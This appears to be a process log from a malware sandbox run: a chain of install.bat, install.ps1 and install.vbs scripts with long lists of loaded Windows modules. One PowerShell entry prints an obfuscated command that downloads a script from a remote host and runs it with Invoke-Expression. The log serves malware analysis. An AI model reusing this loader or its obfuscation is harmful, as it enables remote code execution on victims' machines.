c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\sechost.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\userenv.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\setupapi.dll

PID
2292
CMD
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\install.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\sechost.dll
c:\windows\system32\cmd.exe
c:\windows\system32\msctf.dll
c:\windows\system32\lpk.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\user32.dll

PID
3456
CMD
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\install.ps1'"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\atl.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\gdi32.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\usp10.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\user32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\sechost.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\version.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wshext.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\nsi.dll
c:\windows\system32\msisip.dll
c:\windows\system32\secur32.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.policymodel\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policymodel.dll
c:\windows\assembly\gac_32\microsoft.security.applicationid.policymanagement.policyengineapi.interop\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policyengineapi.interop.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.m870d558a#\ef9d2180a14c81c0b92daf314e56342a\microsoft.management.infrastructure.native.ni.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.xmlhelper\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.xmlhelper.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\assembly\gac_msil\microsoft.backgroundintelligenttransfer.management\1.0.0.0__31bf3856ad364e35\microsoft.backgroundintelligenttransfer.management.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.cmdlets\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.cmdlets.dll
c:\windows\system32\windowspowershell\v1.0\modules\microsoft.powershell.localaccounts\1.0.0.0\microsoft.powershell.localaccounts.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.policymanager\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policymanager.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pae3498d9#\e8948a2d96b83812948847619fc784bc\microsoft.powershell.commands.management.ni.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\assembly\gac_msil\microsoft.windows.diagnosis.troubleshootingpack\6.1.0.0__31bf3856ad364e35\microsoft.windows.diagnosis.troubleshootingpack.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\gac_32\microsoft.windows.diagnosis.sdengine\6.1.0.0__31bf3856ad364e35\microsoft.windows.diagnosis.sdengine.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll

PID
2332
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [<#645848699465732105195380287398536904030378238146025604764639984530492547010939664251867247291236916#>System.Threading.Thread<#332582934080410965342560428418888379619956774943186044163478065547816208676717123690088264390539329#>]::Sleep(885557335194378991089635452410767445166130872137768064703175998831933835909392882813125872937454823);[<#881226574524467035756739689555252751625644928374972474814545552314681526844644513224919051730462161#>System.Threading.Thread<#544462906549900783721356981687314308695583891908023026103953193714290957895846672145227083480734405#>]::Sleep(361720056294770100834534979450663059629730671111794807664607425254769988602043428691349785043126617); $CMcmCLk='(New-';<#104287626038522532610194239851465902448853701335375449476793672258465401850339040992324545446048459#>$cRFZNFU<#908573536026652706339700453607594375571856550901775514836009707493001619461840490399262830314387938#> = 'FcToZba '.Replace('FcToZba','Object');<#330353833174427751061035914351580963843522738065878517819591677731953794999980608218653696559937714#>$tunbltM<#510534477852060853107530118032801301936831658882015175756738686695181667993386351153760457677069284#> = '8623093'.Replace('8623093','Net');$OjDWcdg<#250153126874169582138590232886165222377226929185100191881138388816950390888455167652398373025963315#> = 'duJIsbq'.Replace('duJIsbq','.We');$aKnyylX<#811227991280465912278007551837915671316795971627264870415149471449000404660551561917010286586543568#>='foYRetD '.Replace('foYRetD ','.Downlo');$eidNRbT<#013641744223997255744180918329689968004206360691223920434528726286866310075938732447216203341918429#> = 'OkwZafA'.Replace('OkwZafA','bClient)');[<#308193005475249696351229526676061814607011810057109098409289623130464751615114043683514601550262909#>System.Threading.Thread<#902792029052939860872955749761206506718699305169510257485179048122204793237260241766664687353202368#>]::Sleep(<#998380067313436303362194097464034126273445792407246032775071979484995426295600923067080962795188093#>2000<#306438298499538272654651829335211203279325447707873228998889919131044184735514588168317138005210002#>);<#397309945173855672384369450171872647247418566780208998484776911630098243134646914394900937122996535#>$lwdbCqP<#861122098562862161152450664323292818299173198171719595638757127350487586127512033064810696604331706#>='nbGEVOQ(''https://v3-fastupload.s3-accelerate.amazonaws.com/1641997458-image.mp3'')'.Replace('nbGEVOQ','adString');<#574641522893469503706150684357854152566314917851986966587273130993946711844822565143772025386674753#>$YZMVZRJ<#580913649042024269864618027802447779658184071440001353417374826065197308245895936293353167738067665#> = <#859303231381657595356127086158365125020366821533646321576606884558276145794642540289686675240587716#>$CMcmCLk,<#224473931473431264133899671659170574129100815631780651892791932502059371018612669863981183229099767#>$cRFZNFU,<#537525641023134406932515911730359194848624175568644706481489934387684505898295125351057833901680598#>$tunbltM,<#994931512654288049079387341385298552491778095342074754662856020905244601549295859288594780472599450#>$OjDWcdg,<#272139064285787471548684516721248839661331983800095166438646025883564114051998577993775691815917716#>$eidNRbT,<#933692313555877725402566668010444187488805377765075380124189245835240499212532827989826782709504664#>$aKnyylX,<#928263178579062698705129928185257046260284778043135775361415045562403230912338619853652391385729508#>$lwdbCqP;<#469573790628029047216945044120987780668442213140254403394682963674813132882216296335298562362700434#>$dnKjCGT<#062725273768547580172901546947299382239023848932508432353358088962523733211666541126164853690307471#> = 'XPJYQCF '.Replace('XPJYQCF ','I`E`X');<#717159288687601820585903060231480539672712265216424710315509299302723408648706012051460270579008883#>$OcQmYlt<#645848699465732105195380287398536904030378238146025604764639984530492547010939664251867247291236916#> = <#286549425252617420261699127529272653659319148715343009731638488938630443882891320112000597665012822#>$dnKjCGT+(<#578221803553221160850493742702662470202483065196220890108137147630188139709755250722276067674687473#>$YZMVZRJ -Join '')|I`E`X;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\oleaut32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\msisip.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\secur32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\usp10.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\wshext.dll
c:\windows\system32\ole32.dll
c:\windows\system32\nsi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\psapi.dll
c:\windows\system32\shell32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\rasman.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasapi32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\system32\mswsock.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\credssp.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\rasadhlp.dll

PID
3384
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\Public\install.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft � Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\windows\system32\user32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\propsys.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\userenv.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctf.dll
c:\windows\system32\scrrun.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\wshext.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\imm32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\secur32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\devobj.dll
c:\windows\system32\lpk.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\profapi.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\sxs.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msisip.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll

PID
3808
CMD
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\install.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\usp10.dll
c:\windows\system32\cmd.exe
c:\windows\system32\lpk.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\imm32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll

PID
1124
CMD
PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\install.ps1'"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msctf.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\oleaut32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\atl.dll
c:\windows\system32\mscoree.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\imm32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\msisip.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\system32\version.dll
c:\windows\system32\shell32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\system32\wshext.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\system32\psapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\system32\nsi.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.policymodel\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policymodel.dll
c:\windows\assembly\gac_32\microsoft.security.applicationid.policymanagement.policyengineapi.interop\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policyengineapi.interop.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.cmdlets\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.cmdlets.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.xmlhelper\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.xmlhelper.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\assembly\gac_msil\microsoft.backgroundintelligenttransfer.management\1.0.0.0__31bf3856ad364e35\microsoft.backgroundintelligenttransfer.management.dll
c:\windows\assembly\gac_msil\microsoft.security.applicationid.policymanagement.policymanager\6.1.0.0__31bf3856ad364e35\microsoft.security.applicationid.policymanagement.policymanager.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pae3498d9#\e8948a2d96b83812948847619fc784bc\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.m870d558a#\ef9d2180a14c81c0b92daf314e56342a\microsoft.management.infrastructure.native.ni.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\windowspowershell\v1.0\modules\microsoft.powershell.localaccounts\1.0.0.0\microsoft.powershell.localaccounts.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\normaliz.dll
c:\windows\assembly\gac_msil\microsoft.windows.diagnosis.troubleshootingpack\6.1.0.0__31bf3856ad364e35\microsoft.windows.diagnosis.troubleshootingpack.dll
c:\windows\assembly\gac_32\microsoft.windows.diagnosis.sdengine\6.1.0.0__31bf3856ad364e35\microsoft.windows.diagnosis.sdengine.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll

PID
2412
CMD
"C:\Windows\explorer.exe"
Path
C:\Windows\explorer.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Explorer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\duser.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\cryptbase.dll
